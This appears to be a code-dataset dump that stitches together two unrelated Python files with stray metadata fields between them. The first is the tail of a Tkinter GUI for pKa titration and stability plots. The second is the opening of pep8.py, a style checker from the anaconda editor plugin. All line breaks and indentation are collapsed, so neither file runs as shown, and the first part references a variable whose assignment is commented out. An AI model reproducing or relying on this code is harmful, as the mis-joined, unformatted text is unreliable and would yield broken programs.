self.groups[g1_id].active.get()==1: x=self.get_x(X.pHvalues[-1]) y=label_position[group] colour=self.colour_order[colour_count] self.stab_lines[canvas.create_text(x+50,y,text=group, fill=colour, anchor='w')]=1 # # Update colours # colour_count=colour_count+1 if colour_count==len(self.colour_order): colour_count=0 # # Put in labels for min and max stabilisation # if self.show_min_max_stab.get()==1: obj1=canvas.create_text(850,150,text='MAX destab: %5.2f kT' %max_stabilisation,fill='red',anchor='w') obj2=canvas.create_text(850,180,text='MAX stab: %5.2f kT' %min_stabilisation,fill='blue',anchor='w') self.stab_lines[obj1]=1 self.stab_lines[obj2]=1 # # Do we have an experimental stability curve? # if self.exp_stab_curve: for pH,ddG in self.exp_stab_curve: x=self.get_x(pH) y=get_y_fromstab(ddG,span) self.stab_lines[canvas.create_oval(x-5,y-5,x+5,y+5)]=1 return stability # # --------------- # def start_geom(self): """Start geom opt""" import pKa_calc X=pKa_calc.Boltzmann() distance_matrix=self.setup_system(self.groups,X) import dist_geom GM=dist_geom.distance_optimisation(distance_matrix,self.titration_curves) return # # ---- # def do_geom(self): # # Do geometry optimisation # # Update distances # import pKa_calc X=pKa_calc.Boltzmann() distance_matrix=self.setup_system(self.groups,X) self.MD.set_eqdists(distance_matrix) #diff=self.MD.EM(1) # # Delete old ovals # for oval in self.oval.keys(): self.geom_tc.delete(oval) del self.oval[oval] # # Plot positions # group_count=0 groups=self.MD.atoms.keys() groups.sort() for grp in groups: pos=self.MD.atoms[grp]['pos'] x=pos[0] y=pos[1] z=pos[2] self.oval[self.geom_tc.create_oval(x-5,y-5,x+5,y+5,fill=self.colour_order[group_count])]=1 group_count=group_count+1 self.oval[self.geom_tc.create_text(10,10,anchor='nw',text='Sum of unsatisfied dists: %5.3f' %(diff))]=1 self.geom_window.after(100,self.start_geom) return # # ---------------- # def copy_to_Ekin(self): """Copy a titration curve or a population curve to the Ekin facility of EAT_DB""" try: import os,sys import PEATDB.Ekin except: import tkMessageBox tkMessageBox.showwarning('Cannot find PEAT', 'Cannot find PEAT_DB\nMake sure that you download PEAT from\nhttp://enzyme.ucd.ie/PEAT') return # # Pick a group # self.pick_group=Toplevel() self.pick_group.title('Pick a group') self.pick_group.geometry('+200+200') self.group_picked=IntVar() count=0 groups=self.groups.keys() groups.sort() for group in groups: Radiobutton(self.pick_group,text='%d:%s' %(group,self.groups[group].name.get()), variable=self.group_picked, value=count).grid(row=count,column=0) count=count+1 self.group_picked.set(groups[0]) Button(self.pick_group,text='Copy group',command=self.copy_group).grid(row=count,column=0) Button(self.pick_group,text='Cancel',command=self.cancel_copy_group).grid(row=count,column=1) return # # ---- # def copy_group(self,event=None): """Get the titration curve and send it to Ekin""" group=None for id in self.ids.keys(): if self.ids[id]==self.group_picked.get(): group=id break if not group: raise 'Something very odd happended in copy_group' # # Get the data and reformat it # data=self.titration_curves[group].copy() del data['pKa'] new_data={} new_data[0]={} new_data[1]={} count=0 pHs=self.titration_curves[group].keys() pHs.sort() for pH in pHs: new_data[0][count]=pH new_data[1][count]=self.titration_curves[group][pH] count=count+1 # # Open Ekin, and load the data # import os,sys import EAT_DB.Ekin EK=EAT_DB.Ekin.Ekin(parent=self) EK.pass_data(new_data) # # Destroy the little window # self.pick_group.destroy() return # # ---- # def cancel_copy_group(self,event=None): """Cancel copy group to Ekin""" self.pick_group.destroy() return # # ----------------- # if __name__=='__main__': import sys if len(sys.argv)==2: numgroups=int(sys.argv[1]) pKa_system(numgroups).mainloop() else: pKa_system().mainloop()
mit
2,878,138,869,651,541,500
35.954967
667
0.510268
false
alexfalcucc/anaconda
anaconda_lib/linting/pep8.py
1
79405
#!/usr/bin/env python # pep8.py - Check Python source code formatting, according to PEP 8 # Copyright (C) 2006-2009 Johann C. Rocholl <[email protected]> # Copyright (C) 2009-2014 Florent Xicluna <[email protected]> # Copyright (C) 2014 Ian Lee <[email protected]> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. r""" Check Python source code formatting, according to PEP 8. For usage and a list of options, try this: $ python pep8.py -h This program and its regression test suite live here: http://github.com/jcrocholl/pep8 Groups of errors and warnings: E errors W warnings 100 indentation 200 whitespace 300 blank lines 400 imports 500 line length 600 deprecation 700 statements 900 syntax error """ from __future__ import with_statement import os import sys import re import time import inspect import keyword import tokenize from optparse import OptionParser from fnmatch import fnmatch try: from configparser import RawConfigParser from io import TextIOWrapper except ImportError: from ConfigParser import RawConfigParser __version__ = '1.6.0a0' DEFAULT_EXCLUDE = '.svn,CVS,.bzr,.hg,.git,__pycache__,.tox' DEFAULT_IGNORE = 'E121,E123,E126,E226,E24,E704' try: if sys.platform == 'win32': DEFAULT_CONFIG = os.path.expanduser(r'~\.pep8') else: DEFAULT_CONFIG = os.path.join(os.getenv('XDG_CONFIG_HOME') or os.path.expanduser('~/.config'), 'pep8') except ImportError: DEFAULT_CONFIG = None PROJECT_CONFIG = ('setup.cfg', 'tox.ini', '.pep8') TESTSUITE_PATH = os.path.join(os.path.dirname(__file__), 'testsuite') MAX_LINE_LENGTH = 150 REPORT_FORMAT = { 'default': '%(path)s:%(row)d:%(col)d: %(code)s %(text)s', 'pylint': '%(path)s:%(row)d: [%(code)s] %(text)s', } PyCF_ONLY_AST = 1024 SINGLETONS = frozenset(['False', 'None', 'True']) KEYWORDS = frozenset(keyword.kwlist + ['print']) - SINGLETONS UNARY_OPERATORS = frozenset(['>>', '**', '*', '+', '-']) ARITHMETIC_OP = frozenset(['**', '*', '/', '//', '+', '-']) WS_OPTIONAL_OPERATORS = ARITHMETIC_OP.union(['^', '&', '|', '<<', '>>', '%']) WS_NEEDED_OPERATORS = frozenset([ '**=', '*=', '/=', '//=', '+=', '-=', '!=', '<>', '<', '>', '%=', '^=', '&=', '|=', '==', '<=', '>=', '<<=', '>>=', '=']) WHITESPACE = frozenset(' \t') NEWLINE = frozenset([tokenize.NL, tokenize.NEWLINE]) SKIP_TOKENS = NEWLINE.union([tokenize.INDENT, tokenize.DEDENT]) # ERRORTOKEN is triggered by backticks in Python 3 SKIP_COMMENTS = SKIP_TOKENS.union([tokenize.COMMENT, tokenize.ERRORTOKEN]) BENCHMARK_KEYS = ['directories', 'files', 'logical lines', 'physical lines'] INDENT_REGEX = re.compile(r'([ \t]*)') RAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,') RERAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,.*,\s*\w+\s*$') ERRORCODE_REGEX = re.compile(r'\b[A-Z]\d{3}\b') DOCSTRING_REGEX = re.compile(r'u?r?["\']') EXTRANEOUS_WHITESPACE_REGEX = re.compile(r'[[({] | []}),;:]') WHITESPACE_AFTER_COMMA_REGEX = re.compile(r'[,;:]\s*(?: |\t)') COMPARE_SINGLETON_REGEX = re.compile(r'\b(None|False|True)?\s*([=!]=)' r'\s*(?(1)|(None|False|True))\b') COMPARE_NEGATIVE_REGEX = re.compile(r'\b(not)\s+[^][)(}{ ]+\s+(in|is)\s') COMPARE_TYPE_REGEX = re.compile(r'(?:[=!]=|is(?:\s+not)?)\s*type(?:s.\w+Type' r'|\s*\(\s*([^)]*[^ )])\s*\))') KEYWORD_REGEX = re.compile(r'(\s*)\b(?:%s)\b(\s*)' % r'|'.join(KEYWORDS)) OPERATOR_REGEX = re.compile(r'(?:[^,\s])(\s*)(?:[-+*/|!<=>%&^]+)(\s*)') LAMBDA_REGEX = re.compile(r'\blambda\b') HUNK_REGEX = re.compile(r'^@@ -\d+(?:,\d+)? \+(\d+)(?:,(\d+))? @@.*$') # Work around Python < 2.6 behaviour, which does not generate NL after # a comment which is on a line by itself. COMMENT_WITH_NL = tokenize.generate_tokens(['#\n'].pop).send(None)[1] == '#\n' ############################################################################## # Plugins (check functions) for physical lines ############################################################################## def tabs_or_spaces(physical_line, indent_char): r"""Never mix tabs and spaces. The most popular way of indenting Python is with spaces only. The second-most popular way is with tabs only. Code indented with a mixture of tabs and spaces should be converted to using spaces exclusively. When invoking the Python command line interpreter with the -t option, it issues warnings about code that illegally mixes tabs and spaces. When using -tt these warnings become errors. These options are highly recommended! Okay: if a == 0:\n a = 1\n b = 1 E101: if a == 0:\n a = 1\n\tb = 1 """ indent = INDENT_REGEX.match(physical_line).group(1) for offset, char in enumerate(indent): if char != indent_char: return offset, "E101 indentation contains mixed spaces and tabs" def tabs_obsolete(physical_line): r"""For new projects, spaces-only are strongly recommended over tabs. Okay: if True:\n return W191: if True:\n\treturn """ indent = INDENT_REGEX.match(physical_line).group(1) if '\t' in indent: return indent.index('\t'), "W191 indentation contains tabs" def trailing_whitespace(physical_line): r"""Trailing whitespace is superfluous. The warning returned varies on whether the line itself is blank, for easier filtering for those who want to indent their blank lines. Okay: spam(1)\n# W291: spam(1) \n# W293: class Foo(object):\n \n bang = 12 """ physical_line = physical_line.rstrip('\n') # chr(10), newline physical_line = physical_line.rstrip('\r') # chr(13), carriage return physical_line = physical_line.rstrip('\x0c') # chr(12), form feed, ^L stripped = physical_line.rstrip(' \t\v') if physical_line != stripped: if stripped: return len(stripped), "W291 trailing whitespace" else: return 0, "W293 blank line contains whitespace" def trailing_blank_lines(physical_line, lines, line_number, total_lines): r"""Trailing blank lines are superfluous. Okay: spam(1) W391: spam(1)\n However the last line should end with a new line (warning W292). """ if line_number == total_lines: stripped_last_line = physical_line.rstrip() if not stripped_last_line: return 0, "W391 blank line at end of file" if stripped_last_line == physical_line: return len(physical_line), "W292 no newline at end of file" def maximum_line_length(physical_line, max_line_length, multiline): r"""Limit all lines to a maximum of 79 characters. There are still many devices around that are limited to 80 character lines; plus, limiting windows to 80 characters makes it possible to have several windows side-by-side. The default wrapping on such devices looks ugly. Therefore, please limit all lines to a maximum of 79 characters. For flowing long blocks of text (docstrings or comments), limiting the length to 72 characters is recommended. Reports error E501. """ line = physical_line.rstrip() length = len(line) if length > max_line_length and not noqa(line): # Special case for long URLs in multi-line docstrings or comments, # but still report the error when the 72 first chars are whitespaces. chunks = line.split() if ((len(chunks) == 1 and multiline) or (len(chunks) == 2 and chunks[0] == '#')) and \ len(line) - len(chunks[-1]) < max_line_length - 7: return if hasattr(line, 'decode'): # Python 2 # The line could contain multi-byte characters try: length = len(line.decode('utf-8')) except UnicodeError: pass if length > max_line_length: return (max_line_length, "E501 line too long " "(%d > %d characters)" % (length, max_line_length)) ############################################################################## # Plugins (check functions) for logical lines ############################################################################## def blank_lines(logical_line, blank_lines, indent_level, line_number, blank_before, previous_logical, previous_indent_level): r"""Separate top-level function and class definitions with two blank lines. Method definitions inside a class are separated by a single blank line. Extra blank lines may be used (sparingly) to separate groups of related functions. Blank lines may be omitted between a bunch of related one-liners (e.g. a set of dummy implementations). Use blank lines in functions, sparingly, to indicate logical sections. Okay: def a():\n pass\n\n\ndef b():\n pass Okay: def a():\n pass\n\n\n# Foo\n# Bar\n\ndef b():\n pass E301: class Foo:\n b = 0\n def bar():\n pass E302: def a():\n pass\n\ndef b(n):\n pass E303: def a():\n pass\n\n\n\ndef b(n):\n pass E303: def a():\n\n\n\n pass E304: @decorator\n\ndef a():\n pass """ if line_number < 3 and not previous_logical: return # Don't expect blank lines before the first line if previous_logical.startswith('@'): if blank_lines: yield 0, "E304 blank lines found after function decorator" elif blank_lines > 2 or (indent_level and blank_lines == 2): yield 0, "E303 too many blank lines (%d)" % blank_lines elif logical_line.startswith(('def ', 'class ', '@')): if indent_level: if not (blank_before or previous_indent_level < indent_level or DOCSTRING_REGEX.match(previous_logical)): yield 0, "E301 expected 1 blank line, found 0" elif blank_before != 2: yield 0, "E302 expected 2 blank lines, found %d" % blank_before def extraneous_whitespace(logical_line): r"""Avoid extraneous whitespace. Avoid extraneous whitespace in these situations: - Immediately inside parentheses, brackets or braces. - Immediately before a comma, semicolon, or colon. Okay: spam(ham[1], {eggs: 2}) E201: spam( ham[1], {eggs: 2}) E201: spam(ham[ 1], {eggs: 2}) E201: spam(ham[1], { eggs: 2}) E202: spam(ham[1], {eggs: 2} ) E202: spam(ham[1 ], {eggs: 2}) E202: spam(ham[1], {eggs: 2 }) E203: if x == 4: print x, y; x, y = y , x E203: if x == 4: print x, y ; x, y = y, x E203: if x == 4 : print x, y; x, y = y, x """ line = logical_line for match in EXTRANEOUS_WHITESPACE_REGEX.finditer(line): text = match.group() char = text.strip() found = match.start() if text == char + ' ': # assert char in '([{' yield found + 1, "E201 whitespace after '%s'" % char elif line[found - 1] != ',': code = ('E202' if char in '}])' else 'E203') # if char in ',;:' yield found, "%s whitespace before '%s'" % (code, char) def whitespace_around_keywords(logical_line): r"""Avoid extraneous whitespace around keywords. Okay: True and False E271: True and False E272: True and False E273: True and\tFalse E274: True\tand False """ for match in KEYWORD_REGEX.finditer(logical_line): before, after = match.groups() if '\t' in before: yield match.start(1), "E274 tab before keyword" elif len(before) > 1: yield match.start(1), "E272 multiple spaces before keyword" if '\t' in after: yield match.start(2), "E273 tab after keyword" elif len(after) > 1: yield match.start(2), "E271 multiple spaces after keyword" def missing_whitespace(logical_line): r"""Each comma, semicolon or colon should be followed by whitespace. Okay: [a, b] Okay: (3,) Okay: a[1:4] Okay: a[:4] Okay: a[1:] Okay: a[1:4:2] E231: ['a','b'] E231: foo(bar,baz) E231: [{'a':'b'}] """ line = logical_line for index in range(len(line) - 1): char = line[index] if char in ',;:' and line[index + 1] not in WHITESPACE: before = line[:index] if char == ':' and before.count('[') > before.count(']') and \ before.rfind('{') < before.rfind('['): continue # Slice syntax, no space required if char == ',' and line[index + 1] == ')': continue # Allow tuple with only one element: (3,) yield index, "E231 missing whitespace after '%s'" % char def indentation(logical_line, previous_logical, indent_char, indent_level, previous_indent_level): r"""Use 4 spaces per indentation level. For really old code that you don't want to mess up, you can continue to use 8-space tabs. Okay: a = 1 Okay: if a == 0:\n a = 1 E111: a = 1 E114: # a = 1 Okay: for item in items:\n pass E112: for item in items:\npass E115: for item in items:\n# Hi\n pass Okay: a = 1\nb = 2 E113: a = 1\n b = 2 E116: a = 1\n # b = 2 """ c = 0 if logical_line else 3 tmpl = "E11%d %s" if logical_line else "E11%d %s (comment)" if indent_level % 4: yield 0, tmpl % (1 + c, "indentation is not a multiple of four") indent_expect = previous_logical.endswith(':') if indent_expect and indent_level <= previous_indent_level: yield 0, tmpl % (2 + c, "expected an indented block") elif not indent_expect and indent_level > previous_indent_level: yield 0, tmpl % (3 + c, "unexpected indentation") def continued_indentation(logical_line, tokens, indent_level, hang_closing, indent_char, noqa, verbose): r"""Continuation lines indentation. Continuation lines should align wrapped elements either vertically using Python's implicit line joining inside parentheses, brackets and braces, or using a hanging indent. When using a hanging indent these considerations should be applied: - there should be no arguments on the first line, and - further indentation should be used to clearly distinguish itself as a continuation line. Okay: a = (\n) E123: a = (\n ) Okay: a = (\n 42) E121: a = (\n 42) E122: a = (\n42) E123: a = (\n 42\n ) E124: a = (24,\n 42\n) E125: if (\n b):\n pass E126: a = (\n 42) E127: a = (24,\n 42) E128: a = (24,\n 42) E129: if (a or\n b):\n pass E131: a = (\n 42\n 24) """ first_row = tokens[0][2][0] nrows = 1 + tokens[-1][2][0] - first_row if noqa or nrows == 1: return # indent_next tells us whether the next block is indented; assuming # that it is indented by 4 spaces, then we should not allow 4-space # indents on the final continuation line; in turn, some other # indents are allowed to have an extra 4 spaces. indent_next = logical_line.endswith(':') row = depth = 0 valid_hangs = (4,) if indent_char != '\t' else (4, 8) # remember how many brackets were opened on each line parens = [0] * nrows # relative indents of physical lines rel_indent = [0] * nrows # for each depth, collect a list of opening rows open_rows = [[0]] # for each depth, memorize the hanging indentation hangs = [None] # visual indents indent_chances = {} last_indent = tokens[0][2] visual_indent = None # for each depth, memorize the visual indent column indent = [last_indent[1]] if verbose >= 3: print(">>> " + tokens[0][4].rstrip()) for token_type, text, start, end, line in tokens: newline = row < start[0] - first_row if newline: row = start[0] - first_row newline = not last_token_multiline and token_type not in NEWLINE if newline: # this is the beginning of a continuation line. last_indent = start if verbose >= 3: print("... " + line.rstrip()) # record the initial indent. rel_indent[row] = expand_indent(line) - indent_level # identify closing bracket close_bracket = (token_type == tokenize.OP and text in ']})') # is the indent relative to an opening bracket line? for open_row in reversed(open_rows[depth]): hang = rel_indent[row] - rel_indent[open_row] hanging_indent = hang in valid_hangs if hanging_indent: break if hangs[depth]: hanging_indent = (hang == hangs[depth]) # is there any chance of visual indent? visual_indent = (not close_bracket and hang > 0 and indent_chances.get(start[1])) if close_bracket and indent[depth]: # closing bracket for visual indent if start[1] != indent[depth]: yield (start, "E124 closing bracket does not match " "visual indentation") elif close_bracket and not hang: # closing bracket matches indentation of opening bracket's line if hang_closing: yield start, "E133 closing bracket is missing indentation" elif indent[depth] and start[1] < indent[depth]: if visual_indent is not True: # visual indent is broken yield (start, "E128 continuation line " "under-indented for visual indent") elif hanging_indent or (indent_next and rel_indent[row] == 8): # hanging indent is verified if close_bracket and not hang_closing: yield (start, "E123 closing bracket does not match " "indentation of opening bracket's line") hangs[depth] = hang elif visual_indent is True: # visual indent is verified indent[depth] = start[1] elif visual_indent in (text, str): # ignore token lined up with matching one from a previous line pass else: # indent is broken if hang <= 0: error = "E122", "missing indentation or outdented" elif indent[depth]: error = "E127", "over-indented for visual indent" elif not close_bracket and hangs[depth]: error = "E131", "unaligned for hanging indent" else: hangs[depth] = hang if hang > 4: error = "E126", "over-indented for hanging indent" else: error = "E121", "under-indented for hanging indent" yield start, "%s continuation line %s" % error # look for visual indenting if (parens[row] and token_type not in (tokenize.NL, tokenize.COMMENT) and not indent[depth]): indent[depth] = start[1] indent_chances[start[1]] = True if verbose >= 4: print("bracket depth %s indent to %s" % (depth, start[1])) # deal with implicit string concatenation elif (token_type in (tokenize.STRING, tokenize.COMMENT) or text in ('u', 'ur', 'b', 'br')): indent_chances[start[1]] = str # special case for the "if" statement because len("if (") == 4 elif not indent_chances and not row and not depth and text == 'if': indent_chances[end[1] + 1] = True elif text == ':' and line[end[1]:].isspace(): open_rows[depth].append(row) # keep track of bracket depth if token_type == tokenize.OP: if text in '([{': depth += 1 indent.append(0) hangs.append(None) if len(open_rows) == depth: open_rows.append([]) open_rows[depth].append(row) parens[row] += 1 if verbose >= 4: print("bracket depth %s seen, col %s, visual min = %s" % (depth, start[1], indent[depth])) elif text in ')]}' and depth > 0: # parent indents should not be more than this one prev_indent = indent.pop() or last_indent[1] hangs.pop() for d in range(depth): if indent[d] > prev_indent: indent[d] = 0 for ind in list(indent_chances): if ind >= prev_indent: del indent_chances[ind] del open_rows[depth + 1:] depth -= 1 if depth: indent_chances[indent[depth]] = True for idx in range(row, -1, -1): if parens[idx]: parens[idx] -= 1 break assert len(indent) == depth + 1 if start[1] not in indent_chances: # allow to line up tokens indent_chances[start[1]] = text last_token_multiline = (start[0] != end[0]) if last_token_multiline: rel_indent[end[0] - first_row] = rel_indent[row] if indent_next and expand_indent(line) == indent_level + 4: pos = (start[0], indent[0] + 4) if visual_indent: code = "E129 visually indented line" else: code = "E125 continuation line" yield pos, "%s with same indent as next logical line" % code def whitespace_before_parameters(logical_line, tokens): r"""Avoid extraneous whitespace. Avoid extraneous whitespace in the following situations: - before the open parenthesis that starts the argument list of a function call. - before the open parenthesis that starts an indexing or slicing. Okay: spam(1) E211: spam (1) Okay: dict['key'] = list[index] E211: dict ['key'] = list[index] E211: dict['key'] = list [index] """ prev_type, prev_text, __, prev_end, __ = tokens[0] for index in range(1, len(tokens)): token_type, text, start, end, __ = tokens[index] if (token_type == tokenize.OP and text in '([' and start != prev_end and (prev_type == tokenize.NAME or prev_text in '}])') and # Syntax "class A (B):" is allowed, but avoid it (index < 2 or tokens[index - 2][1] != 'class') and # Allow "return (a.foo for a in range(5))" not keyword.iskeyword(prev_text)): yield prev_end, "E211 whitespace before '%s'" % text prev_type = token_type prev_text = text prev_end = end def whitespace_around_operator(logical_line): r"""Avoid extraneous whitespace around an operator. Okay: a = 12 + 3 E221: a = 4 + 5 E222: a = 4 + 5 E223: a = 4\t+ 5 E224: a = 4 +\t5 """ for match in OPERATOR_REGEX.finditer(logical_line): before, after = match.groups() if '\t' in before: yield match.start(1), "E223 tab before operator" elif len(before) > 1: yield match.start(1), "E221 multiple spaces before operator" if '\t' in after: yield match.start(2), "E224 tab after operator" elif len(after) > 1: yield match.start(2), "E222 multiple spaces after operator" def missing_whitespace_around_operator(logical_line, tokens): r"""Surround operators with a single space on either side. - Always surround these binary operators with a single space on either side: assignment (=), augmented assignment (+=, -= etc.), comparisons (==, <, >, !=, <=, >=, in, not in, is, is not), Booleans (and, or, not). - If operators with different priorities are used, consider adding whitespace around the operators with the lowest priorities. Okay: i = i + 1 Okay: submitted += 1 Okay: x = x * 2 - 1 Okay: hypot2 = x * x + y * y Okay: c = (a + b) * (a - b) Okay: foo(bar, key='word', *args, **kwargs) Okay: alpha[:-i] E225: i=i+1 E225: submitted +=1 E225: x = x /2 - 1 E225: z = x **y E226: c = (a+b) * (a-b) E226: hypot2 = x*x + y*y E227: c = a|b E228: msg = fmt%(errno, errmsg) """ parens = 0 need_space = False prev_type = tokenize.OP prev_text = prev_end = None for token_type, text, start, end, line in tokens: if token_type in SKIP_COMMENTS: continue if text in ('(', 'lambda'): parens += 1 elif text == ')': parens -= 1 if need_space: if start != prev_end: # Found a (probably) needed space if need_space is not True and not need_space[1]: yield (need_space[0], "E225 missing whitespace around operator") need_space = False elif text == '>' and prev_text in ('<', '-'): # Tolerate the "<>" operator, even if running Python 3 # Deal with Python 3's annotated return value "->" pass else: if need_space is True or need_space[1]: # A needed trailing space was not found yield prev_end, "E225 missing whitespace around operator" elif prev_text != '**': code, optype = 'E226', 'arithmetic' if prev_text == '%': code, optype = 'E228', 'modulo' elif prev_text not in ARITHMETIC_OP: code, optype = 'E227', 'bitwise or shift' yield (need_space[0], "%s missing whitespace " "around %s operator" % (code, optype)) need_space = False elif token_type == tokenize.OP and prev_end is not None: if text == '=' and parens: # Allow keyword args or defaults: foo(bar=None). pass elif text in WS_NEEDED_OPERATORS: need_space = True elif text in UNARY_OPERATORS: # Check if the operator is being used as a binary operator # Allow unary operators: -123, -x, +1. # Allow argument unpacking: foo(*args, **kwargs). if (prev_text in '}])' if prev_type == tokenize.OP else prev_text not in KEYWORDS): need_space = None elif text in WS_OPTIONAL_OPERATORS: need_space = None if need_space is None: # Surrounding space is optional, but ensure that # trailing space matches opening space need_space = (prev_end, start != prev_end) elif need_space and start == prev_end: # A needed opening space was not found yield prev_end, "E225 missing whitespace around operator" need_space = False prev_type = token_type prev_text = text prev_end = end def whitespace_around_comma(logical_line): r"""Avoid extraneous whitespace after a comma or a colon. Note: these checks are disabled by default Okay: a = (1, 2) E241: a = (1, 2) E242: a = (1,\t2) """ line = logical_line for m in WHITESPACE_AFTER_COMMA_REGEX.finditer(line): found = m.start() + 1 if '\t' in m.group(): yield found, "E242 tab after '%s'" % m.group()[0] else: yield found, "E241 multiple spaces after '%s'" % m.group()[0] def whitespace_around_named_parameter_equals(logical_line, tokens): r"""Don't use spaces around the '=' sign in function arguments. Don't use spaces around the '=' sign when used to indicate a keyword argument or a default parameter value. Okay: def complex(real, imag=0.0): Okay: return magic(r=real, i=imag) Okay: boolean(a == b) Okay: boolean(a != b) Okay: boolean(a <= b) Okay: boolean(a >= b) Okay: def foo(arg: int = 42): E251: def complex(real, imag = 0.0): E251: return magic(r = real, i = imag) """ parens = 0 no_space = False prev_end = None annotated_func_arg = False in_def = logical_line.startswith('def') message = "E251 unexpected spaces around keyword / parameter equals" for token_type, text, start, end, line in tokens: if token_type == tokenize.NL: continue if no_space: no_space = False if start != prev_end: yield (prev_end, message) if token_type == tokenize.OP: if text == '(': parens += 1 elif text == ')': parens -= 1 elif in_def and text == ':' and parens == 1: annotated_func_arg = True elif parens and text == ',' and parens == 1: annotated_func_arg = False elif parens and text == '=' and not annotated_func_arg: no_space = True if start != prev_end: yield (prev_end, message) if not parens: annotated_func_arg = False prev_end = end def whitespace_before_comment(logical_line, tokens): r"""Separate inline comments by at least two spaces. An inline comment is a comment on the same line as a statement. Inline comments should be separated by at least two spaces from the statement. They should start with a # and a single space. Each line of a block comment starts with a # and a single space (unless it is indented text inside the comment). Okay: x = x + 1 # Increment x Okay: x = x + 1 # Increment x Okay: # Block comment E261: x = x + 1 # Increment x E262: x = x + 1 #Increment x E262: x = x + 1 # Increment x E265: #Block comment E266: ### Block comment """ prev_end = (0, 0) for token_type, text, start, end, line in tokens: if token_type == tokenize.COMMENT: inline_comment = line[:start[1]].strip() if inline_comment: if prev_end[0] == start[0] and start[1] < prev_end[1] + 2: yield (prev_end, "E261 at least two spaces before inline comment") symbol, sp, comment = text.partition(' ') bad_prefix = symbol not in '#:' and (symbol.lstrip('#')[:1] or '#') if inline_comment: if bad_prefix or comment[:1] in WHITESPACE: yield start, "E262 inline comment should start with '# '" elif bad_prefix and (bad_prefix != '!' or start[0] > 1): if bad_prefix != '#': yield start, "E265 block comment should start with '# '" elif comment: yield start, "E266 too many leading '#' for block comment" elif token_type != tokenize.NL: prev_end = end def imports_on_separate_lines(logical_line): r"""Imports should usually be on separate lines. Okay: import os\nimport sys E401: import sys, os Okay: from subprocess import Popen, PIPE Okay: from myclas import MyClass Okay: from foo.bar.yourclass import YourClass Okay: import myclass Okay: import foo.bar.yourclass """ line = logical_line if line.startswith('import '): found = line.find(',') if -1 < found and ';' not in line[:found]: yield found, "E401 multiple imports on one line" def module_imports_on_top_of_file( logical_line, indent_level, checker_state, noqa): r"""Imports are always put at the top of the file, just after any module comments and docstrings, and before module globals and constants. Okay: import os Okay: # this is a comment\nimport os Okay: '''this is a module docstring'''\nimport os Okay: r'''this is a module docstring'''\nimport os Okay: try:\n import x\nexcept:\n pass\nelse:\n pass\nimport y Okay: try:\n import x\nexcept:\n pass\nfinally:\n pass\nimport y E402: a=1\nimport os E402: 'One string'\n"Two string"\nimport os E402: a=1\nfrom sys import x Okay: if x:\n import os """ def is_string_literal(line): if line[0] in 'uUbB': line = line[1:] if line and line[0] in 'rR': line = line[1:] return line and (line[0] == '"' or line[0] == "'") allowed_try_keywords = ('try', 'except', 'else', 'finally') if indent_level: # Allow imports in conditional statements or functions return if not logical_line: # Allow empty lines or comments return if noqa: return line = logical_line if line.startswith('import ') or line.startswith('from '): if checker_state.get('seen_non_imports', False): yield 0, "E402 module level import not at top of file" elif any(line.startswith(kw) for kw in allowed_try_keywords): # Allow try, except, else, finally keywords intermixed with imports in # order to support conditional importing return elif is_string_literal(line): # The first literal is a docstring, allow it. Otherwise, report error. if checker_state.get('seen_docstring', False): checker_state['seen_non_imports'] = True else: checker_state['seen_docstring'] = True else: checker_state['seen_non_imports'] = True def compound_statements(logical_line): r"""Compound statements (on the same line) are generally discouraged. While sometimes it's okay to put an if/for/while with a small body on the same line, never do this for multi-clause statements. Also avoid folding such long lines! Always use a def statement instead of an assignment statement that binds a lambda expression directly to a name. Okay: if foo == 'blah':\n do_blah_thing() Okay: do_one() Okay: do_two() Okay: do_three() E701: if foo == 'blah': do_blah_thing() E701: for x in lst: total += x E701: while t < 10: t = delay() E701: if foo == 'blah': do_blah_thing() E701: else: do_non_blah_thing() E701: try: something() E701: finally: cleanup() E701: if foo == 'blah': one(); two(); three() E702: do_one(); do_two(); do_three() E703: do_four(); # useless semicolon E704: def f(x): return 2*x E731: f = lambda x: 2*x """ line = logical_line last_char = len(line) - 1 found = line.find(':') while -1 < found < last_char: before = line[:found] if ((before.count('{') <= before.count('}') and # {'a': 1} (dict) before.count('[') <= before.count(']') and # [1:2] (slice) before.count('(') <= before.count(')'))): # (annotation) lambda_kw = LAMBDA_REGEX.search(before) if lambda_kw: before = line[:lambda_kw.start()].rstrip() if before[-1:] == '=' and isidentifier(before[:-1].strip()): yield 0, ("E731 do not assign a lambda expression, use a " "def") break if before.startswith('def '): yield 0, "E704 multiple statements on one line (def)" else: yield found, "E701 multiple statements on one line (colon)" found = line.find(':', found + 1) found = line.find(';') while -1 < found: if found < last_char: yield found, "E702 multiple statements on one line (semicolon)" else: yield found, "E703 statement ends with a semicolon" found = line.find(';', found + 1) def explicit_line_join(logical_line, tokens): r"""Avoid explicit line join between brackets. The preferred way of wrapping long lines is by using Python's implied line continuation inside parentheses, brackets and braces. Long lines can be broken over multiple lines by wrapping expressions in parentheses. These should be used in preference to using a backslash for line continuation. E502: aaa = [123, \\n 123] E502: aaa = ("bbb " \\n "ccc") Okay: aaa = [123,\n 123] Okay: aaa = ("bbb "\n "ccc") Okay: aaa = "bbb " \\n "ccc" """ prev_start = prev_end = parens = 0 for token_type, text, start, end, line in tokens: if start[0] != prev_start and parens and backslash: yield backslash, "E502 the backslash is redundant between brackets" if end[0] != prev_end: if line.rstrip('\r\n').endswith('\\'): backslash = (end[0], len(line.splitlines()[-1]) - 1) else: backslash = None prev_start = prev_end = end[0] else: prev_start = start[0] if token_type == tokenize.OP: if text in '([{': parens += 1 elif text in ')]}': parens -= 1 def 